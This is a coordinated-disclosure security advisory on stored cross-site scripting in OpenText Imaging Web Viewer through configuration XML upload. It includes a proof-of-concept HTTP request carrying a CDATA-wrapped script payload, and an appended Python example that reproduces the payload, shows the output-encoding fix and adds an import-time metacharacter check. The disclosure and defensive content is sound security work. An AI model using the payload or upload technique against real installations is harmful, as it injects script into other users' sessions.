#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Imaging Web Viewer
# Vendor:   OpenText
# CSNC ID:  CSNC-2022-004
# Subject:  Cross-Site Scripting via XML Upload
# Severity: High
# Effect:   Cross-Site Scripting
# Author:   Stephan Sekula
# Date:     2022-03-16
#
#############################################################

Introduction
------------
The Imaging Web Viewer combines the benefits of several technologies and
can be used in all imaging scenarios. Based on the new capabilities of
Web 2.0, it provides a completely new experience for the end user.
Because there is no client installation, TCO and administrative overhead
is dramatically reduced. The Imaging Web Viewer is ideal for
Internet-based solutions in which different types of users on different
desktop environments need access to business documents. [1]

During a customer project, we were able to upload a manipulated XML file
via the configuration import. Because the imported values are written to
the configuration page without output encoding, this leads to stored
Cross-Site Scripting.

Affected
--------
Vulnerable:
 * OpenText Imaging Web Viewer <= CE 21.1

Not vulnerable:
 * OpenText Imaging Web Viewer >= CE 21.1 with hotfix

No other versions were tested, but older versions are believed to be
vulnerable as well.

Technical Description
---------------------
An attacker with access to the configuration import can upload a
manipulated XML file. The values it contains are later rendered into the
configuration console page without encoding.

Request:

POST /WebViewer/config?action=importfile HTTP/1.1
Host: webviewer-tst.mah.roche.com:8090
Cookie: [CUT]
[CUT]
Content-Type: multipart/form-data; boundary=---------------------------218446413518949174912543039792
Content-Length: 8192
Origin: [CUT]
[CUT]
Connection: close

-----------------------------218446413518949174912543039792
Content-Disposition: form-data; name="file"; filename="viewer.xml"
Content-Type: text/xml

[CUT]
SCRIPT]]> alert(document.domain); /SCRIPT]]>
[CUT]
-----------------------------218446413518949174912543039792--

Response:

HTTP/1.1 200
Access-Control-Allow-Origin: [CUT]
Access-Control-Allow-Credentials: true
[CUT]
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 22 Dec 2021 14:14:07 GMT
Connection: close
Content-Length: 43235

[…]

Resulting HTML (loaded configuration page):

WebViewer Configuration Console
[CUT]
[CUT]
[CUT]
ILLEGALCOMPONENTNAMES
Reads
[CUT]
[CUT]
[CUT]

Vulnerability Classification
----------------------------
CVSS v3.1 Metrics [2]:
- CVSS Base Score: 8.4 (High)
- CVSS Vector: AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

Workaround / Fix
----------------
Install the hotfix/update provided by OpenText.

Timeline
--------
2021-12-23: Vulnerability discovered
2022-01-25: Informed developer about the vulnerability
2022-03-15: Developer released hotfix
2022-03-16: Coordinated public disclosure

References
----------
[1] https://www.opentext.com/file_source/OpenText/en_US/PDF/OpenText%20Archiving%20and%20Document%20Access%20for%20SAP%20Solutions%20Whitepaper.pdf
[2] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H&version=3.1
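The root cause named in the Technical Description is missing output encoding when imported configuration values are rendered. The following added example (not OpenText's code; the element names, the sample viewer.xml and the page template are assumptions) shows why CDATA sections let markup pass through an XML parser intact, and how HTML-encoding at render time neutralises it:

```python
"""Added example, not part of the advisory or the product: a CDATA
section in an uploaded XML configuration survives parsing as raw text;
encoding that text at render time removes the stored XSS."""
import html
import xml.etree.ElementTree as ET

# Constructed sample of an uploaded viewer.xml (assumed element names).
# The CDATA sections let the value carry '<' and '>' as plain text, so
# the document is still well-formed and the parser does not reject it.
UPLOADED_XML = """<config>
  <setting name="title"><![CDATA[<SCRIPT>]]>alert(document.domain);<![CDATA[</SCRIPT>]]></setting>
  <setting name="pageSize">A4</setting>
</config>"""


def parse_settings(xml_text: str) -> dict:
    """Return {name: value}. ElementTree merges CDATA and character data
    into one .text string, so values may contain markup verbatim."""
    root = ET.fromstring(xml_text)
    return {s.get("name", ""): (s.text or "") for s in root.iter("setting")}


def render_vulnerable(settings: dict) -> str:
    """Writes the values straight into HTML: the stored script runs."""
    rows = "".join(f"<tr><td>{k}</td><td>{v}</td></tr>"
                   for k, v in settings.items())
    return f"<table>{rows}</table>"


def render_fixed(settings: dict) -> str:
    """Same page with HTML-context output encoding of every value."""
    rows = "".join(
        f"<tr><td>{html.escape(k)}</td><td>{html.escape(v)}</td></tr>"
        for k, v in settings.items())
    return f"<table>{rows}</table>"


def settings_with_markup(settings: dict) -> list:
    """Defence in depth at import time: names of settings whose value
    carries HTML metacharacters, for rejecting or logging the upload."""
    return [k for k, v in settings.items()
            if any(c in v for c in "<>\"'")]


if __name__ == "__main__":
    parsed = parse_settings(UPLOADED_XML)
    print("parsed title :", parsed["title"])
    print("flagged      :", settings_with_markup(parsed))
    print("fixed render :", render_fixed(parsed))
```

Encoding at the output stage is the actual fix; the import-time check only adds a detection point for suspicious configuration uploads.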